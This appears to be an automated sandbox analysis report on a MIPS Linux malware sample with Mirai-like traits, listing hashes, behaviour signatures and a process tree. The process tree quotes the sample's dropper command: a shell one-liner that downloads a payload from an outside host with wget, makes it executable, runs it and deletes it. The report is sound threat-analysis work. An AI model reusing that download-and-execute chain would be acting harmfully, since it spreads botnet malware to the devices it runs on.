Analysis
- max time kernel: 0s
- max time network: 124s
- platform: debian-9_mips
- resource: debian9-mipsbe-20221111-en
- resource tags: arch:mips, image:debian9-mipsbe-20221111-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 04-04-2023 23:57
Behavioral task: behavioral1
- Sample: 7b5a94a08497c282ff959886f97242f3.elf
- Resource: debian9-mipsbe-20221111-en
General
- Target: 7b5a94a08497c282ff959886f97242f3.elf
- Size: 155KB
- MD5: 7b5a94a08497c282ff959886f97242f3
- SHA1: 926fe3a7736bd95aac755c18311c25fde2237ed0
- SHA256: 1ae813f4f927b728994e9d71b130f2ea4026e8d843acc55a567870eababe3a5a
- SHA512: 5dbdf7e24b8b7156f03ce6367fe58ddbe58bfe7b554b21ea9d5aaee0f39ff756be8ef74e003ab3504907e685907b4779662c376bd7cef98d91113cdc43bcf44e
- SSDEEP: 3072:B7esBFP23rWfOB7ZOOyGvWKmrThPaLEne7rNb:1euCloGvrmrThPaLEne7rNb
Malware Config
Signatures
- Modifies the Watchdog daemon (1 TTPs)
  Malware like Mirai modify the Watchdog to prevent it restarting an infected system.
- Modifies hosts file (1 IoCs)
  Adds to hosts file used for mapping hosts to IP addresses.
  Processes: wget
    description | ioc        | process
    /etc/hosts  | /etc/hosts | wget
- Writes DNS configuration (1 TTPs, 1 IoCs)
  Writes data to DNS resolver config file.
- Reads system routing table (1 TTPs, 1 IoCs)
  Gets active network interfaces from /proc virtual filesystem.
  Processes: 7b5a94a08497c282ff959886f97242f3.elf
    description     | ioc             | process
    /proc/net/route | /proc/net/route | 7b5a94a08497c282ff959886f97242f3.elf
- Reads system network configuration (1 TTPs, 1 IoCs)
  Uses contents of /proc filesystem to enumerate network settings.
  Processes: 7b5a94a08497c282ff959886f97242f3.elf
    description     | ioc             | process
    /proc/net/route | /proc/net/route | 7b5a94a08497c282ff959886f97242f3.elf
Processes (process tree; indentation shows parent/child)
- /tmp/7b5a94a08497c282ff959886f97242f3.elf (PID 324)
  command line: /tmp/7b5a94a08497c282ff959886f97242f3.elf
  signatures: Reads system routing table; Reads system network configuration
  - /bin/sh (PID 325)
    command line: /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
    - /usr/bin/wget (PID 329)
      command line: wget -q http://gay.energy/.../vivid -O .....
      signatures: Modifies hosts file; Writes DNS configuration
    - /bin/chmod (PID 333)
      command line: chmod 777 .....
    - ./..... (PID 334)
      command line: ./.....
    - /bin/sh (PID 334)
      command line: /bin/sh ./.....
    - /bin/rm (PID 336)
      command line: rm -rf .....